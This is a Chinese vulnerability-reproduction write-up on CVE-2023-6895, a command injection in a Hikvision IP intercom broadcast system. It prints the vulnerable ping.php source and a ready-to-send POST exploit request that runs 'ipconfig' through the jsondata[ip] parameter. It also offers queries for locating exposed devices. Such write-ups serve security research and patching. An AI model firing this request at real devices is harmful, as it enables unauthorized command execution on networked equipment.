[漏洞复现]CVE-2023-6895 IP网络对讲广播系统远程命令执行

admin

102755
文章

87
评论

2023年12月19日13:13:13评论89 views字数 1954阅读6分30秒阅读模式

本人非原创漏洞作者，文章仅作为知识分享用

一切直接或间接由于本文所造成的后果与本人无关

如有侵权，联系删除

产品简介

杭州海康威视数字技术有限公司IP网络对讲广播系统。

开发语言：PHP开发厂商：杭州海康威视数字技术有限公司

[漏洞复现]CVE-2023-6895 IP网络对讲广播系统远程命令执行

空间测绘

回复“CVE-2023-6895”获取空间测绘语句

漏洞描述

海康威视对讲广播系统3.0.3_20201113_RELEASE(HIK)存在漏洞。它已被宣布为关键。该漏洞影响文件/php/ping.php 的未知代码。使用输入 netstat -ano 操作参数 jsondata[ip] 会导致 os 命令注入。

影响版本

v3.0.3_20201113_RELEASE(HIK)

源码分析

ping.php源代码如下：

<?php//  /**//   *@param $ip target ip//   *@param $times ping times//   */header("Content-type: text/html; charset=GB2312");$postData = $_POST['jsondata'];if(isset($postData['ip']) && isset($postData['type'])){     $type = $postData['type'];//类型     $ip = $postData['ip'];//IP地址     $arr = systemopr($type, $ip);     $len = count($arr);     for($i = 0; $i < $len; $i++){          if(isset($arr[$i])){               $arr[$i] = iconv('GB2312', 'UTF-8', $arr[$i]);//gb2312转换为utf-8          }     }     $after = json_encode($arr);//转换成json     echo $after;}
function systemopr($type, $ip, $times=4){     $info = array();          if (PATH_SEPARATOR==':' || DIRECTORY_SEPARATOR=='/'){           //linux           if($type == "0"){               exec("ping -c $times $ip", $info);           }else if($type == "1"){               exec("traceroute -m $times -w 1 $ip", $info);           }else{               exec($ip, $info);          }     }else{          //windows          if($type == "0"){               exec("ping $ip -n $times", $info);          }else if($type == "1"){               exec("tracert -h $times -w 1000 $ip", $info);          }else{               exec($ip, $info);          }     }     return $info;}?>

问题在systemopr()，当jsondata[type]和jsondata[ip]存在值时，进入systemopr()，jsondata[ip]直接被代入命令执行exec()中，但是当jsondata[type]不为“0”或“1”时，不用考虑闭合参数，jsondata[ip]被直接当作命令执行。所以我们可以设置“jsondata[type]=3&jsondata[ip]=要执行的命令”即可。

演示如下：

[漏洞复现]CVE-2023-6895 IP网络对讲广播系统远程命令执行

漏洞利用

POST /php/ping.php HTTP/1.1Host: xxx.xxx.xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 45Origin: http://xxx.xxx.xxxConnection: closeReferer: http://xxx.xxx.xxx/html/system.htmlX-Forwarded-For: 127.0.0.1
jsondata[type]=3&jsondata[ip]=ipconfig

[漏洞复现]CVE-2023-6895 IP网络对讲广播系统远程命令执行

回复“CVE-2023-6895”获取空间测绘语句

原文始发于微信公众号（不够安全）：[漏洞复现]CVE-2023-6895 IP网络对讲广播系统远程命令执行

左青龙
微信扫一扫

右白虎
微信扫一扫

[漏洞复现]CVE-2023-6895 IP网络对讲广播系统远程命令执行

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

漏洞预警 | 大华智慧园区综合管理平台远程代码执行漏洞

发表评论

在线咨询

微信